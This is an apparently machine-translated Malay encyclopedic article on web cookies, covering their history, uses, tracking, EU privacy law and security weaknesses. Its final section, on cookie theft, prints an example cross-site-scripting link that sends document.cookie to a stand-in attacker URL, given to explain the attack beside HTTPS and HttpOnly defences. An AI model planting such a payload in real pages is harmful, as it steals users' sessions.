Kuki Internet: Apa itu? Definisi, Asal, Jenis dan Privasi

Un kuki atau kuki web (Atau biskut, disingkat sebagai saksi di Quebec) ditakrifkan oleh protokol komunikasi HTTP sebagai urutan maklumat yang dihantar oleh pelayan HTTP kepada klien HTTP, yang dikembalikan setiap kali pelayan HTTP yang sama disoal dalam keadaan tertentu.

Kuki itu bersamaan dengan a fail teks kecil yang disimpan pada terminal daripada pengguna Internet. Sedia ada selama lebih daripada 20 tahun, mereka membenarkan pembangun tapak web menyimpan data pengguna untuk memudahkan navigasi mereka dan membenarkan fungsi tertentu. Kuki sentiasa menjadi lebih kurang kontroversi kerana ia mengandungi sisa maklumat peribadi yang berpotensi dieksploitasi oleh pihak ketiga.

Ia dihantar sebagai pengepala HTTP oleh pelayan web kepada pelayar web yang mengembalikannya tidak berubah setiap kali ia mengakses pelayan. Kuki boleh digunakan untuk satu pengesahan, satu sesi (penyelenggaraan negeri), dan untuk menyimpan maklumat khusus tentang pengguna, seperti pilihan tapak atau kandungan troli beli-belah elektronik. Istilah kuki berasal daripada biskut ajaib, konsep yang terkenal dalam pengkomputeran UNIX, yang mengilhamkan idea dan nama kuki penyemak imbas. Beberapa alternatif kepada kuki wujud, masing-masing mempunyai kegunaan, kelebihan dan keburukan tersendiri.

Sebagai fail teks ringkas, kuki tidak boleh dilaksanakan. Mereka tidak perisian pengintip mahupun virus, walaupun kuki daripada sesetengah tapak dikesan oleh banyak perisian anti-virus kerana ia membenarkan pengguna dijejaki apabila mereka melawati berbilang tapak. 

Kebanyakan pelayar moden membenarkan pengguna untuk memutuskan sama ada untuk menerima atau menolak kuki. Pengguna juga boleh pilih berapa lama kuki disimpan. Walau bagaimanapun, penolakan sepenuhnya kuki menjadikan sesetengah tapak tidak boleh digunakan. Contohnya, simpan troli beli-belah atau tapak yang memerlukan log masuk menggunakan bukti kelayakan (nama pengguna dan kata laluan).

sejarah

istilah cookie berasal daripada istilah Inggeris biskut ajaib, yang merupakan paket data yang diterima dan dikembalikan oleh program tidak berubah. Kuki telah digunakan dalam IT apabila Lou Montulli mempunyai idea untuk menggunakannya dalam komunikasi web pada Jun 1994. Pada masa itu, beliau bekerja di Netscape Communications, yang telah membangunkan aplikasi e-dagang untuk pelanggan. Kuki memberi penyelesaian kepada masalah kebolehpercayaan pelaksanaan troli beli-belah maya kedai.

John Giannandrea dan Lou Montulli menulis spesifikasi kuki pertama Netscape pada tahun yang sama. Versi 0.9 beta Mosaic Netscape, dikeluarkan pada 13 Oktober 1994, bersepadu teknologi kuki (lihat siaran). Penggunaan kuki (bukan percubaan) pertama adalah untuk menentukan sama ada pelawat ke tapak web Netscape pernah melawat tapak tersebut sebelum ini. Montulli memfailkan permohonan paten untuk teknologi kuki pada tahun 1995, dan paten AS 5774670 telah diberikan. diberikan pada tahun 1998.

Selepas dilaksanakan dalam Netscape 0.9 beta pada tahun 1994, kuki telah disepadukan ke dalam Internet Explorer 2, dikeluarkan pada Oktober 1995.

Pengenalan kuki masih belum diketahui secara meluas kepada orang ramai. Khususnya, kuki telah diterima secara lalai dalam tetapan penyemak imbas, dan pengguna tidak dimaklumkan tentang kehadiran mereka. Sesetengah orang menyedari kewujudan kuki sekitar suku pertama tahun 1995, tetapi orang ramai hanya mengambil tahu kewujudannya selepas Financial Times menerbitkan artikel pada 12 Februari 1996. Pada tahun yang sama, kuki mendapat banyak perhatian media kerana kemungkinan pencerobohan privasi. Subjek kuki telah dibincangkan dalam dua perundingan Suruhanjaya Perdagangan Persekutuan Amerika pada tahun 1996 dan 1997.

Pembangunan spesifikasi kuki rasmi telah pun dijalankan. Perbincangan pertama spesifikasi rasmi berlaku pada April 1995 di senarai mel www-talk. Satu kumpulan kerja IETF khas telah dibentuk. Dua cadangan alternatif untuk memperkenalkan keadaan kepada transaksi HTTP masing-masing telah dicadangkan oleh Brian Behlendorf dan David Kristol, tetapi kumpulan itu, yang diketuai oleh Kristol sendiri, memutuskan untuk menggunakan spesifikasi Netscape sebagai titik permulaan. Pada Februari 1996, kumpulan kerja menentukan bahawa kuki pihak ketiga adalah ancaman besar kepada privasi. Spesifikasi yang dihasilkan oleh kumpulan itu akhirnya diterbitkan sebagai RFC 2109.

Dari penghujung 2014, kami melihat sepanduk tentang kuki di banyak tapak. Terdapat sekurang-kurangnya satu sambungan penyemak imbas yang membenarkan sepanduk tidak dipaparkan.

Jenis Kuki dan Kegunaan

Pengurusan sesi

Kuki boleh digunakan untuk mengekalkan data pengguna semasa navigasi, tetapi juga merentasi berbilang lawatan. Kuki diperkenalkan untuk menyediakan cara melaksanakan troli beli-belah elektronik, peranti maya di mana pengguna boleh mengumpul barang yang ingin dibeli semasa menyemak imbas tapak.

Hari ini, apl seperti troli beli-belah sebaliknya menyimpan senarai item dalam pangkalan data pada pelayan, yang lebih baik; daripada menyimpannya dalam kuki itu sendiri. Pelayan web menghantar kuki yang mengandungi ID sesi unik. Penyemak imbas web kemudian mengembalikan ID sesi ini pada setiap permintaan berikutnya dan item dalam bakul disimpan dan dikaitkan dengan ID sesi unik yang sama ini.

Penggunaan kuki yang kerap berguna untuk log masuk ke tapak menggunakan bukti kelayakan. Ringkasnya, pelayan web mula-mula menghantar kuki yang mengandungi ID sesi unik. Kemudian pengguna memberikan kelayakan mereka (biasanya nama pengguna dan kata laluan). Aplikasi web kemudian mengesahkan sesi dan membenarkan pengguna mengakses perkhidmatan.

peribadi

Kuki boleh digunakan untuk mengingati maklumat tentang pengguna tapak, untuk menunjukkan kepadanya kandungan yang sesuai pada masa hadapan. Sebagai contoh, pelayan web boleh menghantar kuki yang mengandungi nama pengguna terakhir yang digunakan untuk log masuk ke tapak web tersebut, supaya nama pengguna boleh dipraisi pada lawatan akan datang.

Banyak tapak web menggunakan kuki untuk pemperibadian berdasarkan pilihan pengguna. Pengguna memilih pilihan mereka dalam borang dan menyerahkannya kepada pelayan. Pelayan mengekodkan pilihan dalam kuki dan menghantarnya kembali ke penyemak imbas. Selepas itu, setiap kali pengguna mengakses halaman tapak ini, penyemak imbas mengembalikan kuki dan oleh itu senarai pilihan; pelayan kemudiannya boleh menyesuaikan halaman mengikut keutamaan pengguna. Sebagai contoh, laman web Wikipedia membenarkan penggunanya memilih kulit tapak yang mereka suka. Enjin carian Google membenarkan penggunanya (walaupun mereka tidak berdaftar) untuk memilih bilangan hasil yang mereka mahu lihat pada setiap halaman hasil.

Penjejakan

Kuki penjejakan digunakan untuk menjejaki tabiat menyemak imbas pengguna internet. Ini juga boleh dilakukan sebahagiannya dengan menggunakan alamat IP komputer yang membuat permintaan untuk halaman atau dengan menggunakan pengepala HTTP 'perujuk' yang dihantar oleh pelanggan dengan setiap permintaan, tetapi kuki membenarkan ketepatan yang lebih tinggi. Ini boleh dilakukan seperti dalam contoh berikut:

1. Jika pengguna memanggil halaman di tapak, dan permintaan itu tidak mengandungi kuki, pelayan menganggap bahawa ini adalah halaman pertama yang dilawati oleh pengguna. Pelayan kemudian mencipta rentetan rawak dan menghantarnya ke penyemak imbas bersama dengan halaman yang diminta.
2. Mulai saat ini, kuki akan dihantar secara automatik oleh penyemak imbas setiap kali halaman baharu tapak dipanggil. Pelayan akan menghantar halaman seperti biasa, tetapi juga akan log URL halaman yang dipanggil, tarikh, masa permintaan dan kuki dalam fail log.

Dengan melihat fail log, adalah mungkin untuk melihat halaman mana yang telah dilawati oleh pengguna dan dalam susunan apa. Sebagai contoh, jika fail mengandungi beberapa permintaan yang dibuat menggunakan kuki id=abc, ini mungkin membuktikan bahawa semua permintaan ini datang daripada pengguna yang sama. URL yang diminta, tarikh dan masa yang dikaitkan dengan permintaan membolehkan penyemakan imbas pengguna dijejaki.

Kuki dan suar web pihak ketiga, yang dijelaskan di bawah, juga membolehkan penjejakan merentas tapak yang berbeza. Penjejakan tapak tunggal biasanya digunakan untuk tujuan statistik. Sebaliknya, penjejakan merentasi tapak yang berbeza menggunakan kuki pihak ketiga biasanya digunakan oleh syarikat pengiklanan untuk menghasilkan profil pengguna tanpa nama (yang kemudiannya digunakan untuk menentukan iklan yang harus ditunjukkan kepada pengguna serta menghantar e-mel kepadanya yang sepadan dengan iklan ini — SPAM ).

Kuki penjejakan adalah risiko pencerobohan privasi pengguna tetapi ia boleh dipadamkan dengan mudah. Kebanyakan penyemak imbas moden menyertakan pilihan untuk memadam kuki berterusan secara automatik apabila menutup aplikasi.

Kuki pihak ketiga

Imej dan objek lain yang terkandung dalam halaman web mungkin berada pada pelayan yang berbeza daripada yang mengehos halaman tersebut. Untuk memaparkan halaman, penyemak imbas memuat turun semua objek ini. Kebanyakan laman web mengandungi maklumat daripada sumber yang berbeza. Contohnya, jika anda menaip www.example.com ke dalam penyemak imbas anda, selalunya akan terdapat objek atau iklan pada bahagian halaman yang datang daripada sumber yang berbeza, iaitu daripada domain yang berbeza daripada www. .example.com. Kuki pihak "Pertama" ialah kuki yang ditetapkan oleh domain yang disenaraikan dalam bar alamat penyemak imbas. Kuki pihak ketiga ditetapkan oleh salah satu objek halaman yang datang daripada domain yang berbeza.

Secara lalai, pelayar seperti Mozilla Firefox, Microsoft Internet Explorer dan Opera menerima kuki pihak ketiga, tetapi pengguna boleh menukar tetapan dalam pilihan penyemak imbas untuk menyekatnya. Tiada risiko keselamatan yang wujud dalam kuki pihak ketiga yang membolehkan kefungsian web, namun ia juga digunakan untuk menjejaki pengguna. dari tapak ke tapak.

Alat seperti Ghostery tersedia untuk semua penyemak imbas termasuk Google Chrome boleh menyekat pertukaran antara pihak ketiga.

Perlaksanaan

Kuki ialah cebisan kecil data yang dihantar oleh pelayan web ke penyemak imbas. Penyemak imbas mengembalikannya tidak berubah kepada pelayan, memperkenalkan keadaan (memori peristiwa lampau) ke dalam transaksi HTTP yang tidak bernegara. Tanpa kuki, setiap pengambilan halaman web atau komponen halaman web adalah acara terpencil, bebas daripada permintaan lain yang dibuat ke tapak yang sama. Selain boleh ditetapkan oleh pelayan web, kuki juga boleh ditetapkan dengan bahasa skrip seperti JavaScript, jika disokong dan dibenarkan oleh penyemak imbas.

Spesifikasi kuki rasmi mencadangkan bahawa penyemak imbas seharusnya dapat menyimpan dan menghantar semula bilangan kuki minimum. Khususnya, penyemak imbas seharusnya boleh menyimpan sekurang-kurangnya 300 kuki sebanyak empat kilobait setiap satu dan sekurang-kurangnya 20 kuki untuk satu pelayan atau domain.

Menurut seksyen 3.1 daripada RFC 2965, nama kuki tidak peka huruf besar-besaran.

Kuki boleh menentukan tarikh tamat tempohnya, dalam hal ini kuki akan dipadamkan pada tarikh ini. Jika kuki tidak menyatakan tarikh luput, kuki itu dipadamkan sebaik sahaja pengguna meninggalkan pelayarnya. Oleh itu, menyatakan tarikh tamat tempoh ialah satu cara untuk memastikan kuki bertahan melalui berbilang sesi. Atas sebab ini, kuki dengan tarikh luput dikatakan berterusan. Contoh aplikasi: tapak runcit mungkin menggunakan kuki berterusan untuk merekodkan item yang telah diletakkan pengguna dalam troli beli-belah mereka (sebenarnya, kuki itu mungkin merujuk kepada entri yang disimpan dalam pangkalan data di tapak jualan dan bukan dalam komputer anda) . Melalui cara ini, jika pengguna meninggalkan pelayar mereka tanpa membuat pembelian dan kembali kepadanya kemudian, mereka akan dapat mencari item dalam troli semula. Jika kuki ini tidak memberikan tarikh tamat tempoh, kuki tersebut akan tamat tempoh apabila penyemak imbas ditutup, dan maklumat tentang kandungan bakul akan hilang.

Kuki boleh dihadkan dalam skop kepada domain, subdomain atau laluan tertentu pada pelayan yang menciptanya.

Penciptaan kuki

Pemindahan halaman web dilakukan menggunakan HyperText Transfer Protocol (HTTP). Dengan mengabaikan kuki, penyemak imbas memanggil halaman dari pelayan web dengan secara amnya menghantar teks pendek yang dipanggil Permintaan HTTP. Contohnya, untuk mengakses halaman www.example.org/index.html, penyemak imbas menyambung ke pelayan www.example.org dan menghantar permintaan yang kelihatan seperti ini:

	DAPATKAN /index.html HTTP/1.1Host: www.example.org
navigasi	→	serveur

Pelayan bertindak balas dengan menghantar halaman yang diminta, didahului dengan teks yang serupa, keseluruhannya dipanggil Respons HTTP. Paket ini mungkin mengandungi baris yang mengarahkan penyemak imbas untuk menyimpan kuki:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (halaman HTML)
navigasi	←	serveur

Pelayan hanya menghantar baris Set-Cookie, jika pelayan mahu penyemak imbas menyimpan kuki. Set-Cookie ialah permintaan untuk penyemak imbas menyimpan rentetan name=value dan mengembalikannya dalam semua permintaan akan datang kepada pelayan. Jika penyemak imbas menyokong kuki dan kuki didayakan dalam pilihan penyemak imbas, kuki akan disertakan dalam semua permintaan seterusnya yang dibuat kepada pelayan yang sama. Sebagai contoh, penyemak imbas memanggil halaman www.example.org/news.html dengan menghantar permintaan berikut kepada pelayan www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
navigasi	→	serveur

Ini ialah permintaan untuk halaman lain daripada pelayan yang sama, dan berbeza daripada yang pertama di atas kerana ia mengandungi rentetan yang sebelum ini dihantar pelayan ke penyemak imbas. Terima kasih kepada cara ini, pelayan tahu bahawa permintaan ini dipautkan dengan yang sebelumnya. Pelayan bertindak balas dengan menghantar halaman yang dipanggil, dan juga dengan menambahkan kuki lain padanya.

Nilai kuki boleh diubah oleh pelayan dengan menghantar baris baru Set-Cookie: name=new_value sebagai respons kepada halaman yang dipanggil. Pelayar kemudian menggantikan nilai lama dengan yang baru.

Barisan Set-Cookie biasanya dibuat oleh program CGI atau bahasa skrip lain, bukan oleh pelayan HTTP. Pelayan HTTP (contoh: Apache) hanya akan menghantar hasil program (dokumen yang didahului oleh pengepala yang mengandungi kuki) ke penyemak imbas.

Kuki juga boleh ditetapkan oleh JavaScript atau bahasa lain yang serupa yang dijalankan dalam penyemak imbas, iaitu pada bahagian klien dan bukannya bahagian pelayan. Dalam JavaScript, objek document.cookie digunakan untuk tujuan ini. Sebagai contoh, penyata document.cookie = "temperature=20" mencipta kuki bernama "temperature" dan dengan nilai 20.

Atribut kuki

Selain pasangan nama/nilai, kuki juga boleh mengandungi tarikh luput, laluan, nama domain dan jenis sambungan yang dimaksudkan, iaitu normal atau disulitkan. RFC 2965 juga mentakrifkan bahawa kuki mesti mempunyai nombor versi mandatori, tetapi ini biasanya ditinggalkan. Bahagian data ini mengikut pasangan name=new_value dan dipisahkan oleh titik bertitik. Contohnya, kuki boleh dibuat oleh pelayan dengan menghantar baris Set-Cookie: name=new_value; tamat tempoh=tarikh; laluan=/; domain=.example.org.

Tamat tempoh kuki

Kuki tamat tempoh dan kemudiannya tidak dihantar oleh penyemak imbas ke pelayan dalam situasi berikut:

• Apabila penyemak imbas ditutup, jika kuki tidak berterusan.
• Apabila tarikh luput kuki telah berlalu.
• Apabila tarikh tamat tempoh kuki ditukar (oleh pelayan atau skrip) kepada tarikh pada masa lalu.
• Apabila penyemak imbas memadamkan kuki atas permintaan pengguna.

Situasi ketiga membolehkan pelayan atau skrip memadamkan kuki secara eksplisit. Harap maklum bahawa penyemak imbas web Google Chrome boleh mengetahui tarikh tamat tempoh kuki tertentu dengan mengakses tetapan kandungan. Kuki yang disimpan pada komputer mungkin kekal di sana selama beberapa dekad jika tiada prosedur diambil untuk memadamkannya.

Stereotaip

Sejak diperkenalkan di Internet, banyak idea tentang kuki telah beredar di Internet dan di media. Pada tahun 1998, CIAC, pasukan pemantau insiden komputer Jabatan Tenaga Amerika Syarikat, menentukan bahawa kelemahan keselamatan kuki adalah "pada asasnya tidak wujud" dan menjelaskan bahawa "maklumat tentang asal usul lawatan anda dan butiran halaman web yang anda telah lawati. sudah wujud dalam fail log pelayan web”. Pada tahun 2005, Jupiter Research menerbitkan hasil kajian, di mana peratusan besar responden mempertimbangkan pernyataan berikut:

• Kuki adalah seperti virus, mereka menjangkiti cakera keras pengguna.
• Kuki menjana pop-up.
• Kuki digunakan untuk menghantar spam.
• Kuki hanya digunakan untuk pengiklanan.

Kuki tidak boleh memadam atau membaca maklumat daripada komputer pengguna. Walau bagaimanapun, kuki membolehkan untuk mengesan halaman web yang dilawati oleh pengguna pada tapak tertentu atau set tapak. Maklumat ini boleh dikumpul dalam profil pengguna yang boleh digunakan atau dijual semula kepada pihak ketiga, yang boleh menimbulkan isu privasi yang serius. Sesetengah profil adalah tanpa nama, dalam erti kata ia tidak mengandungi maklumat peribadi, namun profil sedemikian boleh dipersoalkan.

Menurut kajian yang sama, peratusan besar pengguna Internet tidak tahu cara memadam kuki. Salah satu sebab orang tidak mempercayai kuki ialah sesetengah tapak telah menyalahgunakan aspek mengenal pasti secara peribadi kuki dan berkongsi maklumat ini dengan sumber lain. Peratusan besar pengiklanan yang disasarkan dan e-mel yang tidak diminta, dianggap sebagai spam, datang daripada maklumat yang diperoleh daripada kuki penjejakan.

Tetapan penyemak imbas

Kebanyakan pelayar menyokong kuki dan membenarkan pengguna untuk melumpuhkannya. Pilihan yang paling biasa ialah:

• Dayakan atau lumpuhkan kuki sepenuhnya, supaya kuki itu sentiasa diterima atau disekat.
• Benarkan pengguna melihat kuki aktif dalam halaman tertentu, dengan memasukkan javascript: alert(document.cookie) dalam bar alamat penyemak imbas. Sesetengah penyemak imbas menggabungkan pengurus kuki untuk pengguna yang boleh melihat dan secara selektif memadamkan kuki yang disimpan oleh penyemak imbas pada masa ini.

Kebanyakan penyemak imbas juga membenarkan pemadaman penuh data peribadi yang termasuk kuki. Modul tambahan untuk mengawal kebenaran kuki juga wujud.

Privasi dan Kuki Pihak Ketiga

Dalam contoh rekaan ini, sebuah syarikat pengiklanan telah meletakkan sepanduk di dua laman web. Dengan mengehoskan sepanduk pada pelayannya dan menggunakan kuki pihak ketiga, syarikat pengiklanan dapat menjejaki navigasi pengguna melalui kedua-dua tapak ini.

Kuki mempunyai implikasi penting untuk privasi dan kerahasiaan pengguna web. Walaupun kuki hanya dihantar semula ke pelayan yang menetapkannya atau ke pelayan yang dimiliki oleh domain Internet yang sama, halaman web bagaimanapun mungkin mengandungi imej atau komponen lain yang disimpan pada pelayan kepunyaan domain lain. Kuki yang ditetapkan semasa pemulihan komponen luaran ini dipanggil kuki pihak ketiga. Ini termasuk kuki daripada tetingkap pop timbul yang tidak diingini.

Syarikat pengiklanan menggunakan kuki pihak ketiga untuk menjejak pengguna merentasi tapak berbeza yang mereka lawati. Khususnya, syarikat pengiklanan boleh menjejaki pengguna merentas semua halaman yang telah meletakkan imej pengiklanan atau piksel penjejakan. Pengetahuan tentang halaman yang dilawati oleh pengguna membolehkan syarikat pengiklanan menyasarkan keutamaan pengiklanan pengguna.

Keupayaan untuk membina profil pengguna dianggap oleh sesetengah pihak sebagai pencerobohan privasi, terutamanya apabila penjejakan dilakukan merentas domain yang berbeza menggunakan kuki pihak ketiga. Atas sebab ini, sesetengah negara mempunyai perundangan kuki.

Kerajaan Amerika Syarikat melaksanakan peraturan ketat mengenai penempatan kuki pada tahun 2000, selepas didedahkan bahawa Pejabat Dasar Dadah Rumah Putih menggunakan kuki untuk menjejak komputer pengguna yang melihat iklan dadah dalam talian. Pada tahun 2002, aktivis privasi Daniel Brandt mendapati bahawa CIA meninggalkan kuki berterusan pada komputer yang telah melawati tapak webnya. Sebaik sahaja dimaklumkan tentang pelanggaran ini, CIA mengisytiharkan bahawa kuki ini tidak dihantar secara sengaja dan berhenti menetapkannya. Pada 25 Disember 2005, Brandt mendapati bahawa Agensi Keselamatan Negara (NSA) telah meninggalkan dua kuki berterusan pada komputer pelawat kerana kemas kini perisian. Selepas dimaklumkan, NSA segera melumpuhkan kuki.

Di United Kingdom, the Undang-undang kuki “, mula berkuat kuasa pada 25 Mei 2012, mewajibkan laman web tersebut untuk mengisytiharkan niat mereka, sekali gus membolehkan pengguna memilih sama ada mereka mahu meninggalkan jejak atau tidak laluan mereka di Internet. Oleh itu, mereka boleh dilindungi daripada penyasaran pengiklanan. Walau bagaimanapun, mengikut Guardian, persetujuan pengguna Internet tidak semestinya jelas; perubahan telah dibuat pada syarat persetujuan pengguna, menjadikannya demikian tersirat.

Arahan 2002/58 mengenai privasi

Arahan 202/58 privasi dan komunikasi elektronik, mengandungi peraturan tentang penggunaan kuki. Khususnya, artikel 5, perenggan 3 arahan ini memerlukan penyimpanan data (seperti kuki) dalam komputer pengguna hanya boleh dilakukan jika:

• pengguna dimaklumkan tentang cara data digunakan;
• pengguna diberi pilihan untuk menolak operasi storan ini. Walau bagaimanapun, artikel ini juga menyatakan bahawa penyimpanan data atas sebab teknikal adalah dikecualikan daripada undang-undang ini.

Disebabkan akan dilaksanakan mulai Oktober 2003, arahan itu bagaimanapun hanya dipraktikkan dengan sangat tidak sempurna menurut laporan Disember 2004, yang juga menunjukkan bahawa Negara Anggota tertentu (Slovakia, Latvia, Greece, Belgium dan Luxembourg) masih belum menukar arahan ke dalam undang-undang domestik.

Menurut pendapat G29 pada tahun 2010, arahan ini, yang terutamanya mewajibkan penggunaan kuki untuk tujuan pengiklanan tingkah laku, atas persetujuan jelas pengguna Internet masih sangat tidak digunakan. Malah, kebanyakan tapak berbuat demikian dengan cara yang tidak mematuhi arahan, dengan mengehadkan diri mereka kepada "sepanduk" ringkas yang memaklumkan penggunaan "kuki" tanpa memberikan maklumat tentang kegunaannya, tanpa membezakan antara kuki "teknikal". kuki "penjejakan", atau menawarkan pilihan sebenar kepada pengguna yang ingin mengekalkan kuki teknikal (seperti kuki pengurusan troli beli-belah) dan menolak kuki "penjejakan". Malah, banyak tapak tidak berfungsi dengan betul jika kuki ditolak, yang tidak mematuhi arahan 2002/58 atau arahan 95/46 (Perlindungan data peribadi).

Arahan 2009 / 136 / CE

Bahan ini telah dikemas kini oleh Arahan 2009/136/EC bertarikh 25 November 2009 yang menyatakan bahawa "penyimpanan maklumat, atau mendapatkan akses kepada maklumat yang telah disimpan, dalam peralatan terminal pelanggan atau pengguna dibenarkan hanya dengan syarat bahawa pelanggan atau pengguna telah memberikan persetujuannya, selepas menerima, mematuhi Arahan 95/46/EC, maklumat yang jelas dan lengkap, antara yang lain mengenai tujuan pemprosesan”. Oleh itu, arahan baharu itu mengukuhkan kewajipan sebelum meletakkan kuki pada komputer pengguna Internet.

Dalam pertimbangan awal arahan itu, penggubal undang-undang Eropah menyatakan walau bagaimanapun: "Jika secara teknikal mungkin dan berkesan, menurut peruntukan Arahan 95/46/EC yang berkaitan, persetujuan pengguna berkenaan dengan pemprosesan boleh dinyatakan melalui penggunaan tetapan yang sesuai bagi pelayar atau aplikasi lain”. Tetapi sebenarnya, tiada penyemak imbas setakat ini membolehkan untuk mengasingkan kuki teknikal penting daripada kuki pilihan yang harus diserahkan kepada pilihan pengguna.

Arahan baharu ini telah ditukar oleh ahli parlimen Belgium pada Julai 2012. Kajian 2014 menunjukkan bahawa malah ahli parlimen bergelut untuk memohon kekangan arahan tersebut.

P3P

Spesifikasi P3P termasuk keupayaan untuk pelayan menyatakan dasar privasi, yang mentakrifkan jenis maklumat yang dikumpul dan untuk tujuan apa. Dasar ini termasuk (tetapi tidak terhad kepada) penggunaan maklumat yang dikumpul menggunakan kuki. Mengikut takrifan P3P, penyemak imbas boleh menerima atau menolak kuki dengan membandingkan dasar privasi dengan keutamaan pengguna atau dengan bertanya kepada pengguna, membentangkan pernyataan privasi dasar privasi yang diisytiharkan oleh pelayan.

Banyak penyemak imbas, termasuk Apple Safari dan Microsoft Internet Explorer versi 6 dan 7, menyokong P3P yang membolehkan penyemak imbas menentukan sama ada untuk menerima storan kuki pihak ketiga. Pelayar Opera membenarkan pengguna menolak kuki pihak ketiga dan mencipta profil keselamatan global dan khusus untuk domain Internet. Mozilla Firefox versi 2 menggugurkan sokongan P3P tetapi mengembalikannya dalam versi 3.

Kuki pihak ketiga boleh disekat oleh kebanyakan penyemak imbas untuk meningkatkan privasi dan mengurangkan penjejakan iklan, tanpa menjejaskan pengalaman web pengguna secara negatif. Banyak agensi pengiklanan menawarkan pilihan memilih keluar kepada pengiklanan yang disasarkan, dengan menyediakan kuki generik dalam penyemak imbas yang menyahaktifkan penyasaran ini, tetapi penyelesaian sedemikian tidak berkesan secara praktikal, apabila ia dihormati, kerana kuki generik ini dipadamkan sebaik sahaja pengguna memadamkan kuki ini yang membatalkan pilihan keputusan keluar.

Kelemahan biskut

Selain isu privasi, kuki juga mempunyai beberapa kelemahan teknikal. Khususnya, mereka tidak selalu mengenal pasti pengguna dengan tepat, mereka boleh melambatkan prestasi tapak apabila dalam jumlah yang besar, mereka boleh digunakan untuk serangan keselamatan, dan mereka bercanggah dengan pemindahan negeri perwakilan, gaya seni bina perisian.

Pengenalan yang tidak tepat

Jika lebih daripada satu penyemak imbas digunakan pada komputer, dalam setiap pelayar sentiasa terdapat unit storan berasingan untuk kuki. Oleh itu kuki tidak mengenal pasti seseorang, tetapi gabungan akaun pengguna, komputer dan pelayar web. Oleh itu, sesiapa sahaja boleh menggunakan akaun, komputer atau penyemak imbas ini yang mempunyai panoply kuki. Begitu juga, kuki tidak membezakan antara berbilang pengguna yang berkongsi akaun pengguna, komputer dan penyemak imbas yang sama, seperti di "kafe internet" atau mana-mana tempat yang memberikan akses percuma kepada sumber komputer.

Tetapi dalam amalan kenyataan ini ternyata salah dalam kebanyakan kes kerana hari ini komputer "peribadi" (atau telefon pintar, atau tablet, yang lebih teruk) digunakan terutamanya oleh individu tunggal. Ini sama dengan menyasarkan orang tertentu dan melalui jumlah maklumat yang dikumpul tiba pada penyasaran diperibadikan walaupun orang itu tidak "iaitu" dikenal pasti.

Kecurian biskut

Kuki boleh dicuri oleh komputer lain pada rangkaian.

Semasa operasi biasa, kuki dihantar semula antara pelayan (atau sekumpulan pelayan dalam domain yang sama) dan pelayar komputer pengguna. Memandangkan kuki boleh mengandungi maklumat sensitif (nama pengguna, kata laluan yang digunakan untuk pengesahan, dsb.), nilainya tidak boleh diakses oleh komputer lain. Kecurian kuki ialah tindakan memintas kuki oleh pihak ketiga yang tidak dibenarkan.

Kuki boleh dicuri melalui penghidu paket dalam serangan yang dipanggil rampasan sesi. Trafik di internet boleh dipintas dan dibaca oleh komputer selain daripada yang menghantar dan menerima (terutamanya pada ruang Wi-Fi awam yang tidak disulitkan). Trafik ini termasuk kuki yang dihantar melalui sesi menggunakan protokol HTTP biasa. Apabila trafik rangkaian tidak disulitkan, pengguna berniat jahat boleh membaca komunikasi pengguna lain pada rangkaian menggunakan "penghidu paket".

Masalah ini boleh diatasi dengan menyulitkan sambungan antara komputer pengguna dan pelayan menggunakan protokol HTTPS. Pelayan boleh menentukan a bendera selamat semasa menetapkan kuki; penyemak imbas hanya akan menghantarnya melalui talian selamat, seperti sambungan SSL.

Walau bagaimanapun, banyak tapak, walaupun menggunakan komunikasi yang disulitkan HTTPS untuk pengesahan pengguna (iaitu halaman log masuk), kemudian menghantar kuki sesi dan data lain seperti biasa, melalui sambungan HTTP yang tidak disulitkan atas sebab kecekapan. Oleh itu, penyerang boleh memintas kuki pengguna lain dan menyamar sebagai mereka di tapak yang sesuai atau menggunakannya dalam serangan kuki.

Skrip dalam tapak: kuki yang sepatutnya hanya ditukar antara pelayan dan pelanggan dihantar kepada pihak ketiga yang lain.

Satu lagi cara untuk mencuri kuki ialah dengan membuat skrip tapak dan meminta penyemak imbas itu sendiri menghantar kuki ke pelayan berniat jahat yang tidak pernah menerimanya. Pelayar moden membenarkan pelaksanaan bahagian kod yang dicari daripada pelayan. Jika kuki diakses semasa masa jalan, nilainya mungkin disampaikan dalam beberapa bentuk kepada pelayan yang tidak sepatutnya mengaksesnya. Menyulitkan kuki sebelum dihantar melalui rangkaian tidak membantu menghalang serangan.

Jenis skrip dalam tapak ini biasanya digunakan oleh penyerang di tapak yang membenarkan pengguna menyiarkan kandungan HTML. Dengan menyepadukan sebahagian kod yang serasi dalam sumbangan HTML, penyerang boleh menerima kuki daripada pengguna lain. Pengetahuan tentang kuki ini boleh digunakan dengan menyambung ke tapak yang sama menggunakan kuki yang dicuri, dengan itu diiktiraf sebagai pengguna yang kukinya dicuri.

Satu cara untuk menghalang serangan tersebut adalah dengan menggunakan bendera HttpOnly; ia adalah satu pilihan, diperkenalkan sejak versi 6 Internet Explorer dalam PHP sejak versi 5.2.0 yang dirancang untuk menjadikan kuki tidak boleh diakses oleh klien dekat dengan skrip. Walau bagaimanapun, pembangun web harus mengambil kira perkara ini dalam pembangunan tapak mereka supaya mereka kebal terhadap skrip dalam tapak.

Satu lagi ancaman keselamatan yang digunakan ialah fabrikasi permintaan dalam laman web tersebut.

Spesifikasi teknikal rasmi membenarkan kuki dihantar semula hanya kepada pelayan dalam domain dari mana kuki itu berasal. Walau bagaimanapun, nilai kuki boleh dihantar ke pelayan lain menggunakan cara selain daripada pengepala kuki.

Khususnya, bahasa skrip seperti JavaScript biasanya dibenarkan untuk mengakses nilai kuki dan mampu menghantar nilai sewenang-wenangnya ke mana-mana pelayan di Internet. Keupayaan skrip ini digunakan daripada laman web yang membolehkan pengguna menyiarkan kandungan HTML untuk dilihat oleh pengguna lain.

Sebagai contoh, penyerang yang beroperasi pada domain example.com mungkin menyiarkan ulasan yang mengandungi pautan berikut yang menunjuk ke blog popular yang sebaliknya mereka tidak mengawal:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Apabila pengguna lain mengklik pada pautan ini, penyemak imbas melaksanakan bahagian atribut onclick kod, jadi ia menggantikan rentetan document.cookie dengan senarai kuki pengguna yang aktif untuk halaman ini. Oleh itu, senarai kuki ini dihantar ke pelayan example.com, dan oleh itu penyerang dapat mengumpul kuki pengguna ini.

